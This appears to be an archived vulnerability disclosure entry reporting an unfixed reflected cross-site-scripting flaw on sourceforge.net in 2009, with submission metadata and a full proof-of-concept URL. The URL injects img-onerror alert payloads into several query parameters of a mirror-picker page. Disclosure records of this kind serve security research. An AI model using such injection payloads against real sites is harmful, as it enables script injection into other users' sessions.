Security researcher Mystick, has submitted on 18/01/2009 a cross-site-scripting (XSS) vulnerability affecting sourceforge.net, which at the time of submission ranked 150 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 30/01/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 18/01/2009 |
Date published: 30/01/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Mystick |
Domain: sourceforge.net |
Category: XSS |
Pagerank: 150 |
URL: http://sourceforge.net/project/mirror_picker.php?height=350%22%3Cimg%20src=k.png%20onerror=alert(%22 XSS%22)%20/%3E&width=300&group_id=151265%22%3Cimg%20src=k.png%20onerror=alert(%22XSS%22)%20/%3E&use_ mirror=puzzle&filesize=&filename=MPlayer_Portable_1.0_RC2.paf.exe%22%3Cimg%20src=k.png%20onerror=ale rt(123)%20/%3E%22%3Ciframe%20src=&abmode=%22%3Cimg%20src=k.png%20onerror=alert(123)%20/%3E |
Click here to view the mirror
|
|
|